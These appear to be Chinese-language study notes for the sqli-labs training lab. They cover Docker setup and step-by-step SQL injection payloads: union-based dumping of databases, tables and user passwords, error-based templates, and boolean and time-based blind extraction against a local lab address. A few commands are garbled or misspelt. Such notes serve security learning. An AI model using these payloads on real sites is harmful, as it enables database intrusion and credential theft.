- Docker安装环境:
linux install yum
linux yum docker
service docker start
docker search sqli-labs
docker pull acgpiano/aqli-labs
docker images
docker run -dt --name sqli -p 80:80 --rm acgpiano/sqli-labs
容器:
docker ps -a
docker exec -it 容器名 /bin/bash
cd /var/www/html/Less-1
数据库:
mysql
参考文献:https://blog.csdn.net/qq_40939688/article/details/104897480
-
sqli-labs
通用:测试闭合语句:' ,'), ')) ," ,") ,")) 注释符号:--+、# 、--
判断是否存在注入点
select * from users where user_id =‘1’ and 1=1 --+T
select * from users where user_id =‘1’ and 1=2 --+ F
order by 对列排序
select * from users where user_id ='1' order by 3 --+T
select * from users where user_id ='1' order by 4 --+F
union 联合查询
select * from users where user_id ='-1' union 1,2,3 --+ T
database()函数显示当前数据库
select * from users where user_id ='-1' union 1,2,database() --+
按limit数值,一次取一个数据库数据,
union 1,2,schema_name from information_schema.schemata limit 0,1
使用group_concat()函数直接一条语句取出所有数据库
union 1,2,group_concat(schema_name) from information_schema.schemata --+
取出security数据库所有表
union 1,2,group_concat(table_name ) from information_schema.tables where table_schema ='security' --+
#16进制转换:table_schema=0x7365637572697479
取出users表中所有字段
union 1,2,group_concat(column_name ) from information_schema.columns where table_name = 'users' --+
#16进制转换:table_name=0x7573657273
使用concat_ws()函数,取出security,users所有数据
union select 1,2,group_concat(concat_ws('~',username,password)) from security.users --+
盲注:
bool型盲注:
猜解数据库:(1)使用left()函数,建议配合burp
判断第一位:and left ((select database()),1) = 's' --+
判断第二位:and left ((select database()),2) = 'se' --+
数据库名字:and left ((select database()),8) = 'security'
方法(2)二分法猜解
判断值域: and ascii(substr((select database()),1,1)) > 100 T
and ascii(substr((select database()),1,1)) > 156 F
值域:ascii(100~156),然后继续二分法进行判断。
数据库判断:
ascii(substr((select schema_name from information_schema.schemata limit 1,1),#1,1)) =99 --+ c
ascii(substr((select schema_name from information_schema.schemata limit 1,1),2,1)) =104--+ ch
数据库为challenges
数据表判断:
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),1,1)) >114--+ r
ascii(substr((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 1,1),2,1)) =101--+ re
数据库:security 表:referers
数据字段判断:
and ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),1,1)) =117--+ u
and ascii(substr((select column_name from information_schema.columns where table_name = 0x7573657273 limit 1,1),2,1)) =115--+ us
数据库:security 表:referers字段:username
数据提取:
and ascii(substr((select username from security.users limit 1,1),1,1)) >65--+ A
and ascii(substr((select username from security.users limit 1,1),2,1)) >110--+ An
数据库:security 表:referers字段:username 数据:Angelina
双注入方法:使用套用模板
http://192.168.1.196/Less-5/?id=1'union select 1,count(*),concat((插入语句),floor(rand()*2)) as a from information_schema.columns group by a%23
显示当前库:
union select 1,count(*),concat((select database()),floor(rand()*2)) as a from information_schema.columns group by a%23
显示表:
union select 1,count(*),concat((select table_name from information_schema.tables where table_schema=0x7365637572697479 limit 3,1),floor(rand()*2)) as a from information_schema.columns group by a%23
显示列:
union select 1,count(*),concat((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 1,1),floor(rand()*2)) as a from information_schema.columns group by a%23
显示内容:
http://192.168.1.196/Less-5/?id=1' union select 1,count(*),concat((select username from security.users limit 1,1),floor(rand()*2)) as a from information_schema.columns group by a%23
判断数据库长度:
http://192.168.1.196/Less-8/?id=1' and LENGTH(database())>=7 --+
时间盲注:
http://192.168.1.196/Less-10/?id=1" and if(ascii(substr(database(),1,1)) = 115, 0, sleep(2)) --+
总结:先使用单双引号括号,进行闭合sql语句,使用and 1=1、1=2
或者 or 1=1、1=2判断是否有注入点和是否存在回显。
存在回显,使用报错查询语句查询,不存在回显,先判断页面是否提示返回成功和失败页面,页面返回页面是否固定;再选择是使用布尔盲注还是时间盲注,
查询语句尾部基本都插入注释语句,使用order by判断存在多少列,使用 union 联合查询,按照流程一步步走。